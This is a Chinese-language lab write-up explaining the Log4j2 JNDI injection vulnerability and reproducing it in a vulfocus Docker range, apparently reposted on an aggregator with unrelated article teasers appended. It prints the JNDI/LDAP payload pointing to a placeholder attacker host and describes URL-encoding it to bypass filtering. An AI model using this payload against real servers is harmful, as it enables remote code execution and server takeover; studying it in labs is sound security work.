log4j2远程代码执行

漏洞复现
漏洞复现2

这个框架不是web框架了,不是服务器web网站框架了,是java日志框架,就是记录日志信息,每一个程序都有一个日志文件,这个就是java里面记录日志的一个框架,它存在的点也是日志框架那几个代码里面的

log4j2代码原理

背景
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。

log4j2远程代码执行漏洞主要由于存在JNDI注入(java名称目录接口)漏洞,黑客可以恶意构造特殊数据请求包,触发此漏洞,从而成功利用此漏洞可以在目标服务器上执行任意代码。注意,此漏洞是可以执行任意代码,这就很恐怖,相当于黑客已经攻入计算机,可以为所欲为了,就像已经进入你家,想干什么,就干什么,比如运行什么程序,植入什么病毒

经分析,log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件

API接口:应用程序编程接口–API接口把他看作是两个软件之间的桥梁,通过API接口不同软件之间就可以实现互相调用或则交换数据。
本来你没有,你要向第三方获取数据,数据的接口也就被称作为API接口

2021年12月9日,国内多家机构监测到Apache Log4j2存在任意代码执行漏洞,并紧急通报相关情况。由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。鉴于Apache Log4j本身涉及多种应用组件,将此漏洞威胁等级调整为:严重。

影响版本
Log4j2.x<=2.14.1
漏洞原理
我们在很多漏洞复现文章看到构造的payload是这样的${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp}

该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

${}是“EL表达式”的一个常规的表示方式。它的目的是来获得{}中那些指定的对象的值,比如参数或者对象的值

LDAP是什么

LDAP全称是Lightweight Directory Access Protocol( 轻型目录访问协议),LDAP可以理解是一个简单存储数据的数据库

LDAP有一个客户端和服务器端,server端是用来存放资源,client端主要用于查询等操作。服务端都是有各大厂商的产品的比如Microsoft的AD,当然可以自己做。客户端通过LDAP协议去访问服务器端。
所以上述的payload ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp}就相当于ldap通过jndi来提供服务。xxx.xxx.xxx.xxx这个是LDAP服务器端的IP地址,LDAP服务器是默认开启1389端口的,Exp是一个不存在的文件名

JNDI :JAVA NAMING AND Directory interface,Java命名和目录接口),则是Java中用于访问LDAP的API,是为了Java程序访问命名服务和目录服务而提供的统一API。
说白了,就是通过java中的JNDI 访问ldap协议的服务

Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。
Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。

利用jndi访问ldap服务后,ldap服务返回了class攻击代码,被攻击的服务器执行了攻击代码。
远程代码执行漏洞,是利用了Log4j2可以对日志中的“${}”进行解析执行,来进行攻击的。

漏洞复现

1、拉取docker环境
docker pull vulfocus/log4j2-rce-2021-12-09
2、启动环境- 查看镜像
docker images
(开启环境,也可以替换8080端口避免冲突 报错重启 systemctl restart docker fofa靶场 vulfocus靶场安装)
在这里插入图片描述
3、启动并端口映射
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现url中有payload这个可以试着传参
我们借助Dnslog获取一个域名
在这里插入图片描述
这里报400错误,一般是客户端请求包有错误
1)正常来测试,发现这里主要对{}产生过滤。
2)将payload进行url编码
然后进行url编码之后再去访问
在这里插入图片描述
通过访问那个域名网站之后,它的这个服务器后面会去做一个映射,如果这个网站存在这个漏洞,那么它就会访问这个网站, 只要一访问这个网站它就会得到网站的ip地址,说明我的服务器解析了这个代码,说明那个我的这个网站存在这个漏洞

漏洞复现2

先进入靶场目录
在这里插入图片描述
在这里插入图片描述
然后第一次使用靶场使用

docker-compose up -d

在这里插入图片描述
启动成功
在这里插入图片描述
使用bp插件,扫描这个网站,这个加号代表访问的这个url存在远程命令执行
在这里插入图片描述
在这个网站里面1,所有可能存在远程命令执行的参数,都会给它加上对应的POC

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/15832.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java语言规范

Java程序的结构 package—0或1条&#xff0c;出现在程序最开始的地方 Import—0或1条&#xff0c;用于引入Java提供的API class—创建自定义的类&#xff0c;public修饰的class类的类名需要跟文件名完全保持一致 main方法—可执行Java程序的入口&#xff0c;具体介绍查看2.…

Flutter 中的 BackdropFilter 小部件:全面指南

Flutter 中的 BackdropFilter 小部件&#xff1a;全面指南 在Flutter中&#xff0c;BackdropFilter是一个用于创建模糊和颜色调整效果的高级小部件&#xff0c;它可以对组件背后的内容应用滤镜效果。这使得BackdropFilter非常适合实现如背景模糊、颜色混合等复杂的视觉效果。本…

[力扣题解] 463. 岛屿的周长

题目&#xff1a;463. 岛屿的周长 思路 深度优先搜索&#xff1b; 代码 Method 1 对于遍历到的一个地块&#xff0c;向四周探索&#xff0c;越界或者遇到海洋地块说明这条边需要统计&#xff1b; class Solution { private:int dir[4][2] {{1, 0}, {-1, 0}, {0, 1}, {0,…

请叙述Vue 中使用了哪些设计模式

在Vue中&#xff0c;使用了多种设计模式来构建其框架和组件系统&#xff0c;这些设计模式使得Vue具有高效、灵活和易于维护的特性。以下是Vue中常见的设计模式及其简要描述&#xff1a; MVVM&#xff08;Model-View-ViewModel&#xff09;模式&#xff1a; Vue.js是一个MVVM框架…

我用LLaMA-Factory微调大模型来实现商品评论情感分析,准确率高达91.70%

大家好&#xff0c;我是程序锅。 最近在modelscope上闲逛的时候&#xff0c;在数据集板块发现有一个商品评论情感预测数据集。这个数据集源自一个比赛&#xff0c;它的目的是为了预测电商平台顾客的评论是好评还是差评。 数据示例如下所示&#xff08;其中0代表差评&#xff…

数据库漫谈-sybase

sybase就是“system”加“database”&#xff0c;代表着信息系统的底层。Sybase公司很早就推出了关系数据库产品&#xff08;1987年5月推出的Sybase SQLServer1.0&#xff09;。Sybase也是第一个提出Client/Server 体系结构的思想&#xff0c;并率先在Sybase SQLServer 中实现。…

Go 和 Delphi 定义可变参数函数的对比

使用可变参数函数具有灵活性、重用性、简化调用等优点&#xff0c;各个语言有各自定义可变参数函数的方法&#xff0c;也有通用的处理方法&#xff0c;比如使用数组、定义参数结构体、使用泛型等。 这里总结记录一下 go、delphi 的常用的定义可变参数函数的方式&#xff01; 一…

基于图卷积网络的人体3D网格分割

深度学习在 2D 视觉识别任务上取得了巨大成功。十年前被认为极其困难的图像分类和分割等任务&#xff0c;现在可以通过具有类似人类性能的神经网络来解决。这一成功归功于卷积神经网络 (CNN)&#xff0c;它取代了手工制作的描述符。 NSDT工具推荐&#xff1a; Three.js AI纹理开…

1301-习题1-1高等数学

1. 求下列函数的自然定义域 自然定义域就是使函数有意义的定义域。 常见自然定义域&#xff1a; 开根号 x \sqrt x x ​&#xff1a; x ≥ 0 x \ge 0 x≥0自变量为分式的分母 1 x \frac{1}{x} x1​&#xff1a; x ≠ 0 x \ne 0 x0三角函数 tan ⁡ x cot ⁡ x \tan x \cot x …

C++奇迹之旅:vector使用方法以及操作技巧

文章目录 &#x1f4dd;前言&#x1f320; 熟悉vector&#x1f309;使用vector &#x1f320;构造函数&#x1f309;vector遍历 &#x1f320;operator[]&#x1f309;迭代器 &#x1f320;Capacity容量操作&#x1f309; size()&#x1f309; capacity()&#x1f309;resize()…

Vue生命周期钩子是如何实现的

Vue的生命周期钩子是在Vue组件创建、挂载、更新、销毁等过程中自动调用的特殊函数。这些钩子允许开发者在组件的不同阶段执行特定的逻辑。Vue 2 和 Vue 3 在生命周期钩子上有一些差异&#xff0c;主要是因为Vue 3引入了Composition API和更现代的JavaScript特性。 Vue 2 的生命…

C语言中的七种常用排序

今天&#xff0c;为大家整理了C语言中几种常用的排序&#xff0c;以及他们在实际中的运用&#xff08;有Bug请在下方评论&#xff09;&#xff1a; 一.桶排序 #include <stdio.h> int main() {int book[1001],i,j,t,n;for(i0;i<1000;i)book[i]0;scanf("%d"…

二进制中1的个数c++

题目描述 计算鸭给定一个十进制非负整数 NN&#xff0c;求其对应 22 进制数中 11 的个数。 输入 输入包含一行&#xff0c;包含一个非负整数 NN。(N < 10^9) 输出 输出一行&#xff0c;包含一个整数&#xff0c;表示 NN 的 22 进制表示中 11 的个数。 样例输入 100 …

Verilog实战学习到RiscV - 2 : wire 和 reg 的区别

Verilog: wire 和 reg 的区别 1 引言 看Verilog例子过程中&#xff0c;总是分不清 wire 和 reg 的区别。这篇文章把两者放在一起总结一下&#xff0c;并且对比何时使用它们。 1.1 wire &#xff1a;组合逻辑 wire 是 Verilog 设计中的简单导线&#xff08;或任意宽度的总线…

mysql 权限apparmor=“DENIED“问题

简单记录下&#xff0c;最近安装一个mysql&#xff0c;但是修改了对应的数据文件的目录&#xff0c;也就是在/etc/mysql 修改了对应配置文件 [mysqld] datadir/data/mysql/data socket/var/lib/mysql/mysql.sock group_concat_max_len1024000 log-error/data/mysql/log/mysql-…

001集—创建、写入、读取文件fileopen函数——vb.net

此实例为在指定路径下创建一个txt文本文件&#xff0c;在文本文件内输入文字&#xff0c;并弹窗显示输入文字&#xff0c;代码如下&#xff1a; Public Class Form1Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.ClickDim testcontent As Str…

算法在C++中的应用

算法是计算机程序设计的核心&#xff0c;是解决特定问题的一系列步骤或指令的集合。而C作为一种高级编程语言&#xff0c;提供了实现这些算法的工具和平台。C的丰富特性&#xff0c;如面向对象编程、泛型编程、模板元编程等&#xff0c;使得算法的实现更为高效、灵活和易于维护…

英语学习笔记26——Where is it?

Where is it? 它在那里&#xff1f; 课文部分

前端自定义滚动条样式

/* 滚动条轨道 */ ::-webkit-scrollbar-track {background-color: #f1f1f1; /* 轨道背景色 */ }/* 滚动条滑块 */ ::-webkit-scrollbar-thumb {background-color: #888; /* 滑块颜色 */border-radius: 5px; /* 滑块圆角 */ }/* 鼠标悬停在滑块上的效果 */ ::-webkit-scrollbar-…

关于ref和reactive

今天绑定一个表格时半天无法显示数据&#xff0c;发现是formData绑定错了&#xff0c;写成了reactive&#xff0c;console.log中拿到数据了就是不显示&#xff0c;找了大半天才知道原来要调用.ref才能显示&#xff0c;reactive更多的是传值。 .ref 是用于数据绑定的。在Vue3中…